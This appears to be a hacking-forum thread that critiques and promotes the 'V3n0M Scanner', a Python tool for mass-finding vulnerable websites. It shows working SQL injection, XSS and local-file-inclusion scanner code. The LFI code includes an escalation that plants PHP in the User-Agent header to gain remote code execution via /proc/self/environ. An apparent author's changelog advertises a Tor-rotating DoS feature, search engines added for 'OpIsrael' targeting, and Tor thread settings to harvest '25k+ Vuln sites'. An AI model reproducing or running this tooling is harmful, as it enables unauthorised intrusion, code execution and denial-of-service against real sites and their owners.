def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in sqlerrors.items(): if re.search(eMSG, source): print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found" logfile.write("\n"+host) vuln.append(host) col.append(host) break else: pass except: pass
this should have been expanding into breaking all the URL's parameters (GET). This SQL injection scanner (above) also doesn't test POST.
def ClassicLFI(url): lfiurl = url.rsplit('=', 1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found" lfi_log_file.write("\n"+lfiurl+lfi) vuln.append(lfiurl+lfi) target = lfiurl+lfi target = target.replace("/etc/passwd","/proc/self/environ") header = "<? echo md5(baltazar); ?>" try: request_web = urllib2.Request(target) request_web.add_header('User-Agent', header) text = urllib2.urlopen(request_web) text = text.read() if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text): print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found" rce_log_file.write("\n",target) vuln.append(target) except: pass except: passThe LFI tester (above) only works on UNIX based systems. you can see they tried to break out the GET parms, but it's kinda ugly. i also suggest maybe they use a time() type of md5 instead of a steady "baltazar" md5 to check if the LFI was successful, otherwise it can be thwarted easily into giving a false-positive.
def ClassicXSS(url): for xss in xsses: try: source = urllib2.urlopen(url+xss.replace("\n","")).read() if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source): print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)" xss_log_file.write("\n"+url+xss) vuln.append(url+xss) except: pass
the xss checker (above) can be hugely expanded, plus what about content filtering? eh, this isn't very reliable. The sql scanners are ok, probably the best part of the whole scanner. nice code, but i think they have become lazy.
This version is MASSIVELY outdated, Its a V.0.0.1 release... a Beta Release at that, Im on Version V.3.0.2 at the moment ;o Ive stopd all work on it though as the IRC I was part of is no longer fit for purpose so ive left and "Retired" from the scene until I can find a new home.
# V3n0MScanner.py - V.3.0.2
# -Increased headers list to include mobile devices headers
# -Increased XSS Detection by almost double, Detects Actual Bypass required for the attack to progress
# -Increased LFI Detection rates
# -Increased URL Detection rate for valid Vuln sites
# -New Banner Style promoting V3n0M Scanner and Version details
# -New method for identifying Version make: V.x.y.z Where x is the main release version, y is amount of Beta release versions and z is the
# amount of alpha release versions. ie, V.3.0.2 is Main release build 3 that has had 0 Beta test phases and 2 Alpha release phases
# -New Search Engine's powering the scanner so should give alot more results.
# -Intergrated DoS Feature, now you can select to [1] Scan as you used to for vulnerabilitys or [2] TorSledgehammer DoS Attack
# -New MultiPlatform version instead of the old Linux/Windows seperate releases
# -TorSledgehammer DoS tool rotates attacks through multiple detected Internet connections to spread attack workload and increase DoS success rate.
# -Added Israeli SearchEngines for increasing "Hit" ratio for "OpIsrael" scans.
Please Note I do NOT support AnonSet anymore, the IRC's admin has no interest in protecting the safety of its members and frankly is unfit emotionally to run a IRC server. Anyone wishing to assist in working on the V3n0M toolkit or provide input please let me know.
tiny pic*Edit
The Original poster was incorrect, the correct best settings are 100Threads over ToR or 200 Threads on a normal connection.
this code is really buggy and i can bet it needs alot of editting work. goodluck with it.
Beta, says it all :3 and wasnt that much editing really for anyone who understands the basics of Python... Oh and yourll find even the beta version posted by the original poster still worked fine, even if it would give a 15% false positive hit, with a "all dorks scan" on .com yourd still get 25k+ Vuln sites. (* Not to mention the Original Poster posted a windows only version o.o might explain why some people failed to get it to run lol. *)
